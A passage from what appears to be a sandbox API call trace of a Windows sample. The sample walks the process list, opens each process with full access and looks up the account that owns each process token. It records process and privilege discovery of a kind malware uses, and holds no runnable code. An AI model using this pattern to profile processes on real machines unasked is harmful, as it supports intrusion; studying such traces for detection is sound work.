th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.597] SetLastError (dwErrCode=0x0) [0124.597] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x254) returned 0x240 [0124.597] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0xec) returned 0 [0124.597] CloseHandle (hObject=0x240) returned 1 [0124.597] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.597] SetLastError (dwErrCode=0x0) [0124.597] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x298) returned 0x240 [0124.597] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0xec) returned 0 [0124.597] CloseHandle (hObject=0x240) returned 1 [0124.598] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.598] SetLastError (dwErrCode=0x0) [0124.598] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x2c8) returned 0x240 [0124.598] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0xec) returned 0 [0124.598] CloseHandle (hObject=0x240) returned 1 [0124.598] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.599] SetLastError (dwErrCode=0x0) [0124.599] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x33c) returned 0x240 [0124.599] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x22c) returned 1 [0124.599] GetTokenInformation (in: TokenHandle=0x22c, TokenInformationClass=0x1, TokenInformation=0x2ab5e0, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x2ab5e0, ReturnLength=0x10ddd0) returned 0 [0124.599] GetTokenInformation (in: TokenHandle=0x22c, TokenInformationClass=0x1, TokenInformation=0x2ab5e0, TokenInformationLength=0x1c, ReturnLength=0x10ddd0 | out: TokenInformation=0x2ab5e0, ReturnLength=0x10ddd0) returned 1 [0124.599] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x2ab5f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.600] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x2ab5f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x2b51d0, cchName=0x10ddd8, ReferencedDomainName=0x2ab6a0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="SYSTEM", cchName=0x10ddd8, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.600] CloseHandle (hObject=0x240) returned 1 [0124.600] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.601] SetLastError (dwErrCode=0x0) [0124.601] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x374) returned 0x240 [0124.601] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0xe8) returned 1 [0124.601] GetTokenInformation (in: TokenHandle=0xe8, TokenInformationClass=0x1, TokenInformation=0x2ab5e0, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x2ab5e0, ReturnLength=0x10ddd0) returned 0 [0124.601] GetTokenInformation (in: TokenHandle=0xe8, TokenInformationClass=0x1, TokenInformation=0x2ab5e0, TokenInformationLength=0x1c, ReturnLength=0x10ddd0 | out: TokenInformation=0x2ab5e0, ReturnLength=0x10ddd0) returned 1 [0124.601] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x2ab5f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.602] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x2ab5f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x2b50f0, cchName=0x10ddd8, ReferencedDomainName=0x2aba00, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="SYSTEM", cchName=0x10ddd8, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.602] CloseHandle (hObject=0x240) returned 1 [0124.602] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0124.603] SetLastError (dwErrCode=0x0) [0124.603] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x3b0) returned 0x0 [0124.603] CloseHandle (hObject=0x0) returned 0 [0124.603] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.604] SetLastError (dwErrCode=0x0) [0124.604] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x3fc) returned 0x240 [0124.604] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0xe8) returned 0 [0124.604] CloseHandle (hObject=0x240) returned 1 [0124.604] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.604] SetLastError (dwErrCode=0x0) [0124.604] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x1cc) returned 0x240 [0124.604] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0xe8) returned 0 [0124.605] CloseHandle (hObject=0x240) returned 1 [0124.605] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0124.605] SetLastError (dwErrCode=0x0) [0124.605] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x448) returned 0x240 [0124.605] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x1d4) returned 1 [0124.605] GetTokenInformation (in: TokenHandle=0x1d4, TokenInformationClass=0x1, TokenInformation=0x2ab5e0, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x2ab5e0, ReturnLength=0x10ddd0) returned 0 [0124.605] GetTokenInformation (in: TokenHandle=0x1d4, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x2c, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 1 [0124.605] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.606] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x24a490, cchName=0x10ddd8, ReferencedDomainName=0x2b5190, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x10ddd8, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.607] CloseHandle (hObject=0x240) returned 1 [0124.607] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0124.607] SetLastError (dwErrCode=0x0) [0124.607] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x458) returned 0x240 [0124.607] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0xf4) returned 1 [0124.607] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 0 [0124.607] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x2c, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 1 [0124.608] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.608] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x24a850, cchName=0x10ddd8, ReferencedDomainName=0x2b51d0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x10ddd8, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.609] CloseHandle (hObject=0x240) returned 1 [0124.609] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0124.609] SetLastError (dwErrCode=0x0) [0124.609] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x47c) returned 0x240 [0124.609] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0xf4) returned 0 [0124.609] CloseHandle (hObject=0x240) returned 1 [0124.609] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0124.610] SetLastError (dwErrCode=0x0) [0124.610] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x4a4) returned 0x240 [0124.610] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x244) returned 1 [0124.610] GetTokenInformation (in: TokenHandle=0x244, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 0 [0124.610] GetTokenInformation (in: TokenHandle=0x244, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x2c, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 1 [0124.610] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.611] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x24a490, cchName=0x10ddd8, ReferencedDomainName=0x2b50f0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x10ddd8, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.611] CloseHandle (hObject=0x240) returned 1 [0124.611] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x4d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.612] SetLastError (dwErrCode=0x0) [0124.612] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x4d0) returned 0x240 [0124.612] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x244) returned 0 [0124.612] CloseHandle (hObject=0x240) returned 1 [0124.612] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x374, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0124.613] SetLastError (dwErrCode=0x0) [0124.613] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x59c) returned 0x240 [0124.613] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x1d8) returned 1 [0124.613] GetTokenInformation (in: TokenHandle=0x1d8, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 0 [0124.613] GetTokenInformation (in: TokenHandle=0x1d8, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x2c, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 1 [0124.613] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.614] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x24a850, cchName=0x10ddd8, ReferencedDomainName=0x2b5190, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x10ddd8, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.614] CloseHandle (hObject=0x240) returned 1 [0124.614] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x634, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0124.615] SetLastError (dwErrCode=0x0) [0124.615] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x634) returned 0x240 [0124.615] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x1d8) returned 0 [0124.615] CloseHandle (hObject=0x240) returned 1 [0124.615] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="bones plans mice.exe")) returned 1 [0124.616] SetLastError (dwErrCode=0x0) [0124.616] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x118) returned 0x240 [0124.616] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x228) returned 1 [0124.616] GetTokenInformation (in: TokenHandle=0x228, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 0 [0124.616] GetTokenInformation (in: TokenHandle=0x228, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x2c, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 1 [0124.616] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.616] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x24a490, cchName=0x10ddd8, ReferencedDomainName=0x2b51d0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x10ddd8, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.617] CloseHandle (hObject=0x240) returned 1 [0124.617] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x74c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="sullivan_estimated_korea.exe")) returned 1 [0124.618] SetLastError (dwErrCode=0x0) [0124.618] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x74c) returned 0x240 [0124.618] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0xd8) returned 1 [0124.618] GetTokenInformation (in: TokenHandle=0xd8, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 0 [0124.618] GetTokenInformation (in: TokenHandle=0xd8, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x2c, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 1 [0124.618] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.618] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x24a850, cchName=0x10ddd8, ReferencedDomainName=0x2b50f0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x10ddd8, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.619] CloseHandle (hObject=0x240) returned 1 [0124.619] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="like.exe")) returned 1 [0124.619] SetLastError (dwErrCode=0x0) [0124.619] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x6c0) returned 0x240 [0124.620] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0xf0) returned 1 [0124.620] GetTokenInformation (in: TokenHandle=0xf0, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 0 [0124.620] GetTokenInformation (in: TokenHandle=0xf0, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x2c, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 1 [0124.620] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.620] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x24a490, cchName=0x10ddd8, ReferencedDomainName=0x2b5190, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x10ddd8, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.621] CloseHandle (hObject=0x240) returned 1 [0124.621] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="carbcreated.exe")) returned 1 [0124.621] SetLastError (dwErrCode=0x0) [0124.621] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x2b0) returned 0x240 [0124.621] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0xcc) returned 1 [0124.621] GetTokenInformation (in: TokenHandle=0xcc, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 0 [0124.621] GetTokenInformation (in: TokenHandle=0xcc, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x2c, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 1 [0124.621] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), 